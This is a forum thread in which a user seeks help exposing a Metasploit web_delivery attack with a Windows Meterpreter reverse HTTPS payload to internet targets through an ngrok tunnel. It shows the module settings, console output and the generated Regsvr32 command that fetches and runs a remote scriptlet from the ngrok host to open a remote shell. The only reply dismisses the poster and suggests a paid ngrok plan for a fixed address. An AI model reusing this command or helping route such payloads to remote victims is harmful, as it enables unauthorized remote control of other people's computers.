Web_delivery & windows/meterpreter/reverse_https over internet?

[Tobias6483]

Hello guys. I wonder how i can use this module and payload on the internet, and not only local.. I tried with lhost= my kali linux ip and it worked for local pc'es. -> which is not what i want.

I also tried using my public ip but that didn't work aswell as ping my ngrok connection to a 'real' ip -> that didn't work aswell. Neither did the lhost= ac0e9310ffee.ngrok.io which showed in my ./ngrok http 8080 shell. 

 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting        Required  Description
   ----      ---------------        --------  -----------
   EXITFUNC  process                yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     ac0e9310ffee.ngrok.io  yes       The local listener hostname
   LPORT     443                    yes       The local listener port
   LURI                             no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   3   Regsvr32

 

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 3.134.39.220:443
msf6 exploit(multi/script/web_delivery) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.15:8080/test
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://ac0e9310ffee.ngrok.io:8080/test.sct scrobj.dll
msf6 exploit(multi/script/web_delivery) > 
 

 

 

ngrok by @inconshreveable                                                                      (Ctrl+C to quit)
                                                                                                               
Session Status                online                                                                           
Account                       Tobias (Plan: Free)                                                              
Version                       2.3.35                                                                           
Region                        United States (us)                                                               
Web Interface                 http://127.0.0.1:4040                                                            
Forwarding                   http://ac0e9310ffee.ngrok.io -> http://localhost:8080                            
Forwarding                   https://ac0e9310ffee.ngrok.io -> http://localhost:8080                           
                                                                                                               
Connections                   ttl     opn     rt1     rt5     p50     p90                                      
                              0       0       0.00    0.00    0.00    0.00                                     
                                                                             

 

 

[RazorHaxxor]

hello mate do you have any idea how internet works? if not then you may need to study it first, 

so you want a static ip and port for your payload isn't it? easiest way pay the premium subscription of ngrok